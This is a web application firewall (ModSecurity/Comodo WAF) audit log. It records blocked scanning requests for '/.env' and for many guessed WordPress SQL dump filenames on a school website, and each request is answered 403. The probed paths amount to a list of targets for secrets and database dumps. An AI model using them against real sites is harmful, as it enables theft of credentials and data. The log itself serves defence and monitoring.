--a86dc46b-Z-- --d885463d-A-- [03/Jun/2025:19:21:15 +0700] aD7ouwhM7ynDNybXsoPRgAAAAEA 103.236.140.4 46258 103.236.140.4 8181 --d885463d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d885463d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d885463d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748953275957936 799 (- - -) Stopwatch2: 1748953275957936 799; combined=343, p1=304, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d885463d-Z-- --5fd4512e-A-- [03/Jun/2025:20:24:30 +0700] aD73jo0G58RZMmoh8H0omwAAAI4 103.236.140.4 38380 103.236.140.4 8181 --5fd4512e-B-- GET /prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5fd4512e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fd4512e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957070590176 2658 (- - -) Stopwatch2: 1748957070590176 2658; combined=953, p1=425, p2=495, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fd4512e-Z-- --e35edb05-A-- [03/Jun/2025:20:24:31 +0700] aD73jwhM7ynDNybXsoPiugAAAEo 103.236.140.4 38394 103.236.140.4 8181 --e35edb05-B-- GET /wordpress_f.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e35edb05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e35edb05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957071550573 2646 (- - -) Stopwatch2: 1748957071550573 2646; combined=925, p1=412, p2=482, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35edb05-Z-- --0a922c13-A-- [03/Jun/2025:20:24:32 +0700] aD73kAhM7ynDNybXsoPiuwAAAEg 103.236.140.4 38408 103.236.140.4 8181 --0a922c13-B-- GET /wordpress_.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --0a922c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a922c13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957072555019 2939 (- - -) Stopwatch2: 1748957072555019 2939; combined=1011, p1=520, p2=459, p3=0, p4=0, p5=32, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a922c13-Z-- --22c24b4c-A-- [03/Jun/2025:20:24:33 +0700] aD73kZAN5Lj366RdGMz9aQAAAM8 103.236.140.4 38426 103.236.140.4 8181 --22c24b4c-B-- GET /main_wordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --22c24b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22c24b4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957073816342 3715 (- - -) Stopwatch2: 1748957073816342 3715; combined=1636, p1=704, p2=898, p3=0, p4=0, p5=34, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22c24b4c-Z-- --107d332b-A-- [03/Jun/2025:20:24:35 +0700] aD73k0SujXvW2xVCZlUPFAAAAAg 103.236.140.4 38448 103.236.140.4 8181 --107d332b-B-- GET /WP.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --107d332b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --107d332b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957075422822 2609 (- - -) Stopwatch2: 1748957075422822 2609; combined=962, p1=477, p2=457, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --107d332b-Z-- --b8eeeb5f-A-- [03/Jun/2025:20:24:37 +0700] aD73lZAN5Lj366RdGMz9agAAAMA 103.236.140.4 38470 103.236.140.4 8181 --b8eeeb5f-B-- GET /unnamed-file.wp.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b8eeeb5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8eeeb5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".wp.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957077065386 3770 (- - -) Stopwatch2: 1748957077065386 3770; combined=934, p1=435, p2=470, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8eeeb5f-Z-- --43d0b25c-A-- [03/Jun/2025:20:24:39 +0700] aD73lwhM7ynDNybXsoPivQAAAFI 103.236.140.4 38504 103.236.140.4 8181 --43d0b25c-B-- GET /usr.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --43d0b25c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43d0b25c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957079603607 2242 (- - -) Stopwatch2: 1748957079603607 2242; combined=813, p1=364, p2=425, p3=0, p4=0, p5=23, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43d0b25c-Z-- --5a96e152-A-- [03/Jun/2025:20:24:40 +0700] aD73mESujXvW2xVCZlUPIAAAAAs 103.236.140.4 38518 103.236.140.4 8181 --5a96e152-B-- GET /wp_users.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5a96e152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a96e152-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957080380282 2297 (- - -) Stopwatch2: 1748957080380282 2297; combined=888, p1=388, p2=405, p3=0, p4=0, p5=95, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a96e152-Z-- --195bd771-A-- [03/Jun/2025:20:24:40 +0700] aD73mESujXvW2xVCZlUPIQAAAA8 103.236.140.4 38524 103.236.140.4 8181 --195bd771-B-- GET /wp_user.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --195bd771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --195bd771-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957080937775 2538 (- - -) Stopwatch2: 1748957080937775 2538; combined=913, p1=452, p2=432, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --195bd771-Z-- --b781ab42-A-- [03/Jun/2025:20:24:41 +0700] aD73mUSujXvW2xVCZlUPJQAAAAo 103.236.140.4 38538 103.236.140.4 8181 --b781ab42-B-- GET /wordpress1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b781ab42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b781ab42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957081610672 3960 (- - -) Stopwatch2: 1748957081610672 3960; combined=1396, p1=733, p2=619, p3=0, p4=0, p5=44, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b781ab42-Z-- --18a86b41-A-- [03/Jun/2025:20:24:43 +0700] aD73m5AN5Lj366RdGMz9bQAAAM0 103.236.140.4 38560 103.236.140.4 8181 --18a86b41-B-- GET /blog.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --18a86b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a86b41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957083221513 2246 (- - -) Stopwatch2: 1748957083221513 2246; combined=703, p1=333, p2=347, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a86b41-Z-- --45ccb80a-A-- [03/Jun/2025:20:24:44 +0700] aD73nJAN5Lj366RdGMz9bwAAAMg 103.236.140.4 38578 103.236.140.4 8181 --45ccb80a-B-- GET /wp1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.47 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --45ccb80a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ccb80a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957084475626 2549 (- - -) Stopwatch2: 1748957084475626 2549; combined=793, p1=392, p2=373, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ccb80a-Z-- --43d1a770-A-- [03/Jun/2025:20:24:46 +0700] aD73no0G58RZMmoh8H0opAAAAIQ 103.236.140.4 38604 103.236.140.4 8181 --43d1a770-B-- GET /wp2.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.239.232.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.239.232.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --43d1a770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43d1a770-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957086317344 2480 (- - -) Stopwatch2: 1748957086317344 2480; combined=863, p1=418, p2=418, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43d1a770-Z-- --f467d206-A-- [03/Jun/2025:20:24:47 +0700] aD73nwhM7ynDNybXsoPiwwAAAFg 103.236.140.4 38622 103.236.140.4 8181 --f467d206-B-- GET /wp3.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.239.232.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.239.232.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --f467d206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f467d206-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957087545082 2507 (- - -) Stopwatch2: 1748957087545082 2507; combined=915, p1=455, p2=430, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f467d206-Z-- --b269e828-A-- [03/Jun/2025:20:24:50 +0700] aD73oo0G58RZMmoh8H0oqgAAAJA 103.236.140.4 38664 103.236.140.4 8181 --b269e828-B-- GET /baza.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.132 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b269e828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b269e828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957090964687 2422 (- - -) Stopwatch2: 1748957090964687 2422; combined=1011, p1=471, p2=505, p3=0, p4=0, p5=35, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b269e828-Z-- --2a7a1e14-A-- [03/Jun/2025:20:24:52 +0700] aD73pI0G58RZMmoh8H0orAAAAIU 103.236.140.4 38686 103.236.140.4 8181 --2a7a1e14-B-- GET /wp_4.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.166 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2a7a1e14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7a1e14-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957092422517 2501 (- - -) Stopwatch2: 1748957092422517 2501; combined=914, p1=432, p2=454, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7a1e14-Z-- --0ce99f20-A-- [03/Jun/2025:20:24:54 +0700] aD73ppAN5Lj366RdGMz9dAAAANU 103.236.140.4 38708 103.236.140.4 8181 --0ce99f20-B-- GET /wp3.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.166 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --0ce99f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce99f20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957094013944 3638 (- - -) Stopwatch2: 1748957094013944 3638; combined=1047, p1=504, p2=443, p3=0, p4=0, p5=100, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 